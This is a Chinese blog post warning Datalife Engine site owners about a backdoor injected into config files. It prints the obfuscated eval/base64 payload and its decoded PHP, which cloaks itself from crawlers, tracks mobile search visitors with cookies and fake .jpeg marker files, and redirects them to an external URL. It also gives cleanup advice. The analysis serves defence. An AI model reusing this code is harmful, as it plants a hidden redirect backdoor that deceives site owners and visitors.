英语
俄语
警惕 Datalife Engine 程序的后门代码
Datalife Engine这个常见的后门已经存在了很久了,在不经意间就被植入到你的系统中。下面分析一下代码!
一般后面代码会被注入到 engine/data/config.php或engine/data/dbconfig.php中,下面贴一段代码做演示:
@eVAl(gzUncOmprEss(base64_decode('eF6lVm1v2zYQ/itOYEQ24srxS9K1hjqvqbcE7erOSbYVbSBQImWxlkiBpOp6of/7jpSt2I5UrNgHy+Rzd8/dkUceadQ6wiSijOCWczOdzT5eXl1PfnXa7YcC3kM7SuSkPWp+JUJS5jn9i7Nhf+CMmoqmMOvDCPPQa/o3k9mfk9kn58308u73yftbfzad3jr3Ixq1xlT6mIqW0Wy4TjfPEo6w7GZcKtk1jpsZUnHs1SiM1iSRpIJomT2jLExyTCpp9sS1JCEKY1JlvhHUGgZUCfqtm3KcJ9UBHGrUUsmVVCTtJjQQSKyqqA41aqnKjDFSKECyMrUKpdHabCnxI5oQr1BvuMcGEu6XjMyPR02pkDqQG0hu5UsuFgfyJVJEpEgstjorFHPOPcf3HQgkl+ZLhJ1Q88G+s1XqeZsBwL0S7e+g/RId7KCDEh3uoMMSPd9Bz0uU5N8JSpqoJBHeeFvoo2bMJUwB/ORc3d4atQ/+1dT835i6b4roUWzQ2w/+DA4UjCazycxqkFJlNvnjzopubv272bWR5nL+hODuZmJGM/+X3+CIFaerdWRU2xxKwJh4jmPG46NMkLmfIhXGLahERHGuKfKRCGPN+Twhms5TpF9zpRHD5JsOYJRRTISeJApdMx3mItFmbTRKA9D/a3Dp64/oteBLLdDSIHOidIpo4nap07FhQK2ZotxzbvldIGdQDFryOc+1jAkD95RBBc213QJXp5K5oc5VHhDNMeMLGLvBShfRW0dgT2wOMqX9IgUbndBLqgw9X7gi118Xbsh1nvC5jlBIAiC3Sbsa5+HC/DRDcKdpxBNwKYLQ1QFl8yIRERVpHOSRuQHkDjuiYxX6OqWMarlKAy41D6DsNcOCUwwCnGnAKWL6Sz8lmghK5OfGxZnOYs7I42LBysBOUSmJajX9y+n07fXkk4MT4ufgxqfYud8q7UXiIYwZWUqNMEThZnGmvcSsq9Ie6FFpVsKLCMEBglRBtNGy+iAWSFHOimRJVPgwo8aR13DsjTFurgiSUnrHvePRer22y2EOt0++AYFsPR73dvukEEn6D9nFX/WM5CC98rzdW7vD7Dfie1NJY5CEnC8osBZwx3n+ot8bDp8/h84Ed1OrffrTEICOCdr2mqO9GMsrzbBZSZYrP+RQiWxPXrKdn52dtUdVuuX114ElacN9ma58Y+UVynAWqohtVFvVV+PCDVzIcPQjnhG2x4tOj43vhIeLVjPqvJtevvUnf0P7DXnOFFgIgrCR7Cx3ad4G00Lx9BRIoHGzEK5fo24zWgpazAolA0VJLmOAnji9e2+gMOGSWLHtNg/jnCWULfayK7HHOCpXr6yKzrFZPLNVezu1k8ZDme7Tdd3xYtbVKr4y8bT/e3Rb7LFQ/1+Bb05Kw/MapjJOWjU1bUu+qqpJ/v26Xj8t7McY6s/QuXXXDAQ05MPjtXmXVZkN7iuDhFiGtcFVM/WrmQYd6NE/xtSrZup34A3wY0zVRL0OPDFqiOqYLoDKdNr63Oulg+9KhzV1ct5xXpzDJozLy6q3DXQcw81AgBHudkG+tpx+72c6N4+F0GX2IbM0326GUmIGisquXFi5ncdhNwzNwLWvH1B7VupZw5cys3MVN15aQk4Vsvb8ndOG/xNJuLAvp8iDP3ghwPuBsJBjiB86qmUV4B56k/e5uSArqGEMVjCR5CQXXg/MNuHDn+J5lkFGDnQ06EzQDjNwfgK96YDciZXKXnZNmOZRBl/b0kZwVFSxgfU95unpre46Z5XFsV7/C5sjZws='))); 有点看不明白吧,使用var_dump 直接打印出来就是这样的代码:
string(3405) "if(!defined('SORRYCHIEF')){define('SORRYCHIEF',true);$versin='260423';$tim='22';$doc=$_SERVER['DOCUMENT_ROOT'];if(@is_dir($doc .'/uploads/posts/')){$pathh=$doc .'/uploads/posts/';}elseif(@is_dir($doc .'/wp-includes/')){$pathh=$doc .'/wp-includes/';}elseif(@is_dir($doc .'/cache/')){$pathh=$doc .'/cache/';}elseif(@is_dir($doc .'/bitrix/modules/')){$pathh=$doc .'/bitrix/modules/';}elseif(@is_dir($doc .'/system/library/')){$pathh=$doc .'/system/library/';}elseif(@is_dir($doc .'/includes/database/')){$pathh=$doc .'/includes/database/';}$time_file=$pathh ."timer.jpeg";$stat_file=$pathh ."stats.jpeg";$work_file=$pathh ."watermark.jpeg";$yahooo='__' .'us' .'er_' .'i' .'d_';$yahooo1=$yahooo .'1';$yahooo2=$yahooo .'2';$yahooo3=$yahooo .'3';$yahooo4=$yahooo .'4';$yahooo5=$yahooo .'5';$yahoooeu='__' .'us' .'er_' .'i' .'ds_';$ser=@$_SERVER;$hos=@$ser['HTT' .'P_HO' .'ST'];$rf=@$ser['HT' .'TP_REF' .'ERER'];$ref=@$ser['REQU' .'EST_URI'];$usg=@$ser['HT' .'TP_USE' .'R_AGENT'];if((!$usg)or($usg=='')or(@!preg_match('/baidu|ia_arch|oogle|igma|Bot|andex|bot|pider|EltaIn|curl|ahoo|amble|W3C_|YaBrow|rawle|Wget|mail./i',$usg))){if(@preg_match('/andex.|pinter|sogou|shenma|instag|yahoo.|msn.c|utube|odnok|ut.by|baidu|mail.r|search|smi2|igma|ambler|witter|ok.ru|vk.co|ulog|facebo.|oogle.|duckduck|naver|aol.c|rbc.|bing./i',$rf)){if((@preg_match('/p.browser|htc_|mini|symbos|obile|ndroid|midp|ymbian|j2me|eries\ 60|phone/i',$usg))and(@!isset($_COOKIE['dle_user_id']))and(@!preg_match('/=addnews|admin.php|=logout|=register|=feedback|login.php|administration/i',$ref))and($ref != '/')){@$yeasss="1";}}}if((@file_exists($work_file))&(@filesize($work_file)>1)&(@isset($_COOKIE[$yahoooeu]))&(@!isset($_COOKIE[$yahooo]))){@setcookie($yahooo,'79214477',time()+84214,'/');if(@!file_exists($time_file)){@file_put_contents($time_file,time()+85000);@file_put_contents($stat_file,"1");}$my_time=@file_get_contents($time_file);if($my_time>@time()){$f=@fopen($stat_file,"a+");@flock($f,LOCK_EX);$count=@fread($f,@filesize($stat_file));@$count++;@ftruncate($f,0);@fwrite($f,$count);@fflush($f);@flock($f,LOCK_UN);@fclose($f);}else{@unlink($time_file);@unlink($stat_file);@file_put_contents($work_file,"");}if(@file_exists($stat_file)){$count=@file_get_contents($stat_file);if($count>$tim){@unlink($time_file);@unlink($stat_file);@unlink($work_file);}}}if((@file_exists($work_file))&(@filesize($work_file)>1)&(@$yeasss == "1")&(!isset($_COOKIE[$yahoooeu]))){@setcookie($yahoooeu,'79214477',time()+84214,'/');}if(@!file_exists($work_file)&(@!isset($_COOKIE[$yahooo5]))){$bre=$_COOKIE[$yahooo];if(@isset($_COOKIE[$yahooo3])){@setcookie($yahooo4,'4',time()+84214,'/');}if(@isset($_COOKIE[$yahooo2])){@setcookie($yahooo3,'3',time()+84214,'/');}if(@isset($_COOKIE[$yahooo1])){@setcookie($yahooo2,'2',time()+84214,'/');}if(@isset($_COOKIE[$yahooo])){@setcookie($yahooo1,'1',time()+84214,'/');}if((@isset($_COOKIE[$yahooo6]))or(@isset($_COOKIE[$yahooo2]))or(@isset($_COOKIE[$yahooo3]))or(@isset($_COOKIE[$yahooo4]))){@setcookie($yahooo5,'954',@time()+85114,'/');@header(@strrev('21?ig' .'c.n' .'iw' .'/pame' .'tis/sk' .'ce' .'hc/cc' .'.s' .'pam-e' .'tis/' .'/:sp' .'tth :n' .'oita' .'coL') .'&seor' .'ef=' .rawurlencode($rf) .'parameter=\$keyword&se=\$se&ur=1' .strrev(strtoupper('=rerefer_ptth&')) .rawurlencode('http://' .$hos .$ref));exit;}if((!isset($_COOKIE[$yahooo]))&(@$yeasss == "1")){@setcookie($yahooo,'0',time()+84214,'/');}}}"还是有点乱是吧,让我们格式化一下代码:
<?php
if (!defined("SORRYCHIEF")) {
define("SORRYCHIEF", true);
$versin = "260423";
$tim = "22";
$doc = $_SERVER["DOCUMENT_ROOT"];
if (@is_dir($doc . "/uploads/posts/")) {
$pathh = $doc . "/uploads/posts/";
} elseif (@is_dir($doc . "/wp-includes/")) {
$pathh = $doc . "/wp-includes/";
} elseif (@is_dir($doc . "/cache/")) {
$pathh = $doc . "/cache/";
} elseif (@is_dir($doc . "/bitrix/modules/")) {
$pathh = $doc . "/bitrix/modules/";
} elseif (@is_dir($doc . "/system/library/")) {
$pathh = $doc . "/system/library/";
} elseif (@is_dir($doc . "/includes/database/")) {
$pathh = $doc . "/includes/database/";
}
$time_file = $pathh . "timer.jpeg";
$stat_file = $pathh . "stats.jpeg";
$work_file = $pathh . "watermark.jpeg";
$yahooo = "__" . "us" . "er_" . "i" . "d_";
$yahooo1 = $yahooo . "1";
$yahooo2 = $yahooo . "2";
$yahooo3 = $yahooo . "3";
$yahooo4 = $yahooo . "4";
$yahooo5 = $yahooo . "5";
$yahoooeu = "__" . "us" . "er_" . "i" . "ds_";
$ser = @$_SERVER;
$hos = @$ser["HTT" . "P_HO" . "ST"];
$rf = @$ser["HT" . "TP_REF" . "ERER"];
$ref = @$ser["REQU" . "EST_URI"];
$usg = @$ser["HT" . "TP_USE" . "R_AGENT"];
if (
!$usg or
$usg == "" or
@!preg_match(
"/baidu|ia_arch|oogle|igma|Bot|andex|bot|pider|EltaIn|curl|ahoo|amble|W3C_|YaBrow|rawle|Wget|mail./i",
$usg
)
) {
if (
@preg_match(
"/andex.|pinter|sogou|shenma|instag|yahoo.|msn.c|utube|odnok|ut.by|baidu|mail.r|search|smi2|igma|ambler|witter|ok.ru|vk.co|ulog|facebo.|oogle.|duckduck|naver|aol.c|rbc.|bing./i",
$rf
)
) {
if (
@preg_match(
"/p.browser|htc_|mini|symbos|obile|ndroid|midp|ymbian|j2me|eries\ 60|phone/i",
$usg
) and
@!isset($_COOKIE["dle_user_id"]) and
@!preg_match(
"/=addnews|admin.php|=logout|=register|=feedback|login.php|administration/i",
$ref
) and
$ref != "/"
) {
@$yeasss = "1";
}
}
}
if (
@file_exists($work_file) &
(@filesize($work_file) > 1) &
@isset($_COOKIE[$yahoooeu]) &
@!isset($_COOKIE[$yahooo])
) {
@setcookie($yahooo, "79214477", time() + 84214, "/");
if (@!file_exists($time_file)) {
@file_put_contents($time_file, time() + 85000);
@file_put_contents($stat_file, "1");
}
$my_time = @file_get_contents($time_file);
if ($my_time > @time()) {
$f = @fopen($stat_file, "a+");
@flock($f, LOCK_EX);
$count = @fread($f, @filesize($stat_file));
@$count++;
@ftruncate($f, 0);
@fwrite($f, $count);
@fflush($f);
@flock($f, LOCK_UN);
@fclose($f);
} else {
@unlink($time_file);
@unlink($stat_file);
@file_put_contents($work_file, "");
}
if (@file_exists($stat_file)) {
$count = @file_get_contents($stat_file);
if ($count > $tim) {
@unlink($time_file);
@unlink($stat_file);
@unlink($work_file);
}
}
}
if (
@file_exists($work_file) &
(@filesize($work_file) > 1) &
(@$yeasss == "1") &
!isset($_COOKIE[$yahoooeu])
) {
@setcookie($yahoooeu, "79214477", time() + 84214, "/");
}
if (@!file_exists($work_file) & @!isset($_COOKIE[$yahooo5])) {
$bre = $_COOKIE[$yahooo];
if (@isset($_COOKIE[$yahooo3])) {
@setcookie($yahooo4, "4", time() + 84214, "/");
}
if (@isset($_COOKIE[$yahooo2])) {
@setcookie($yahooo3, "3", time() + 84214, "/");
}
if (@isset($_COOKIE[$yahooo1])) {
@setcookie($yahooo2, "2", time() + 84214, "/");
}
if (@isset($_COOKIE[$yahooo])) {
@setcookie($yahooo1, "1", time() + 84214, "/");
}
if (
@isset($_COOKIE[$yahooo6]) or
@isset($_COOKIE[$yahooo2]) or
@isset($_COOKIE[$yahooo3]) or
@isset($_COOKIE[$yahooo4])
) {
@setcookie($yahooo5, "954", @time() + 85114, "/");
@header(
@strrev(
"21?ig" .
"c.n" .
"iw" .
"/pame" .
"tis/sk" .
"ce" .
"hc/cc" .
".s" .
"pam-e" .
"tis/" .
"/:sp" .
"tth :n" .
"oita" .
"coL"
) .
"&seor" .
"ef=" .
rawurlencode($rf) .
'parameter=\$keyword&se=\$se&ur=1' .
strrev(strtoupper("=rerefer_ptth&")) .
rawurlencode("http://" . $hos . $ref)
);
exit();
}
if (!isset($_COOKIE[$yahooo]) & (@$yeasss == "1")) {
@setcookie($yahooo, "0", time() + 84214, "/");
}
}
}
?>
这里就看的更清晰一些了!
首先,通过判断常量SORRYCHIEF是否已经定义,如果未定义,则定义该常量并赋值为true。
紧接着,定义了两个变量$version和$tim,分别赋值为字符串'260423'和'22'。
接下来,获取$_SERVER['DOCUMENT_ROOT']的值,并将其赋给变量$doc。
通过一系列的if...elseif...语句,判断目录是否存在,并将存在的目录路径保存在变量$pathh中。依次判断是否存在以下目录:/uploads/posts/、/wp-includes/、/cache/、/bitrix/modules/、/system/library/、/includes/database/。
定义了三个文件路径变量:$time_file、$stat_file、$work_file。分别拼接了$pathh和文件名timer.jpeg、stats.jpeg、watermark.jpeg。
定义了一系列以$__user_id开头的变量名,并赋值为__us + er_ + id_ + 数字后缀。
获取了$_SERVER数组的值,并将其赋给变量$ser。
将$ser['HTTP_HOST']的值赋给变量$hos,将$ser['HTTP_REFERER']的值赋给变量$rf,将$ser['REQUEST_URI']的值赋给变量$ref,将$ser['HTTP_USER_AGENT']的值赋给变量$usg。
根据一系列条件判断,如果$usg为空或未匹配到一些特定的爬虫/搜索引擎的关键词,则进行下一步判断。
进行一系列判断,判断文件$work_file是否存在且大小大于1,并且$__user_ids所对应的Cookie不存在。如果满足条件,则设置指定的Cookie和文件操作等。
继续进行其他判断和操作,根据条件判断删除文件、设置Cookie等。
如果中招了,只清除config.php或dbconfig.php中的代码是没用的,还要将 /uploads/posts/ 下的 timer.jpeg、stats.jpeg、watermark.jpeg 文件清除,我也有幸中过几次,所幸这代码只是在特定的环境下,跳转到指定的url,但也很危险了,我曾试过使用官方原版的,只做最基础的破解来替换网站文件,达到清理恶意代码的想法,但过段时间似乎还是重新在文件中注入代码,有些头疼。
在这里,要劝各位使用dle的朋友们,不要使用来路不明的插件、hack模板以及其他能威胁到安全的东西,这里不仅限dle,在同服务器上其他网站也尽量避免。
最后希望大家注意网站安全,保证数据安全,同时我也在琢磨一种有效的方式尽量杜绝这种情况的发生。